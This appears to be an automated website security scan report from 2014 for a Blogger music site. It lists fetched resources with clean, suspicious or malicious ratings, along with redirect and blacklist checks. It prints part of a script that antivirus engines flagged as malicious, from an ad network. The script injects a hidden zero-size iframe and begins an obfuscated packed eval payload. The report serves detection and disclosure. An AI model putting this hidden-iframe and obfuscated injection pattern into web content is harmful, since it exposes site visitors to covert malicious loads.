Scanned pages/files
Request | Server response | Status |
http://obaudosrockers.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 09 Oct 2014 19:51:34 GMT Location: http://www.obaudosrockers.com/ Server: ghs Content-Length: 227 Content-Type: text/html; charset=UTF-8 Alternate-Protocol: 80:quic,p=0.01 X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block | clean |
http://www.obaudosrockers.com/ | 200 OK Content-Length: 103006 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.anunciad.com.br <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html dir='ltr' xmlns='http://www.w3.org/1999/xhtml' xmlns:b='http://www.google.com/2005/gml/b' xmlns:data='http://www.google.com/2005/gml/data' xmlns:expr='http://www.google.com/2005/gml/expr'> <head> <link href='http://fonts.googleapis.com/css?family=Marck+Script|Pinyon+Script|Kristi|Salsa' rel='stylesheet' type ...[3839 bytes skipped]...
https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js | 200 OK Content-Length: 78601 Content-Type: text/javascript | clean |
http://ads.egrana.com.br/anuncio/popup/10203 | 200 OK Content-Length: 6554 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe style="display:none" src="http://ads.egrana.com.br/stats/pop/" width="0" height="0" frameborder="0" marginwidh="0" marginheight="0" scrolling="no"></iframe>');eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+' Antivirus reports:
https://apis.google.com/js/plusone.js | 200 OK Content-Length: 12600 Content-Type: application/javascript | clean |
http://tweetmeme.com/i/scripts/button.js | HTTP/1.1 301 Moved Permanently Cache-Control: max-age=86400 Connection: close Date: Thu, 09 Oct 2014 19:51:39 GMT Location: http://tweetmeme.com/ Server: nginx Content-Length: 178 Content-Type: text/html Expires: Fri, 10 Oct 2014 19:51:39 GMT X-Served-By: h03 | clean |
http://tweetmeme.com/ | 200 OK Content-Length: 1833 Content-Type: text/html | clean |
http://tweetmeme.com/js/vendor/jquery-1.9.1.min.js | 200 OK Content-Length: 92630 Content-Type: application/x-javascript | clean |
http://tweetmeme.com/i/scripts/js/main.js | 404 Not Found Content-Length: 564 Content-Type: text/html | clean |
http://tweetmeme.com/test404page.js | HTTP/1.1 301 Moved Permanently Cache-Control: max-age=86400 Connection: close Date: Thu, 09 Oct 2014 19:51:40 GMT Location: http://tweetmeme.com/ Server: nginx Content-Length: 178 Content-Type: text/html Expires: Fri, 10 Oct 2014 19:51:40 GMT X-Served-By: h03 | clean |
http://static.ak.fbcdn.net/connect.php/js/FB.Share | 200 OK Content-Length: 165813 Content-Type: application/x-javascript | clean |
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 21308 Content-Type: text/javascript | clean |
http://www.anunciad.com.br/table_ad.jsp?partner=4568 | 200 OK Content-Length: 1769 Content-Type: text/html | clean |
https://www.blogger.com/static/v1/widgets/2271878333-widgets.js | 200 OK Content-Length: 90737 Content-Type: text/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: obaudosrockers.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 09 Oct 2014 19:51:34 GMT
Location: http://www.obaudosrockers.com/
Server: ghs
Content-Length: 227
Content-Type: text/html; charset=UTF-8
Alternate-Protocol: 80:quic,p=0.01
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
...227 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: obaudosrockers.com
Referer: http://www.google.com/search?q=obaudosrockers.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=obaudosrockers.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://obaudosrockers.com/
Result: obaudosrockers.com is not infected or malware details are not published yet.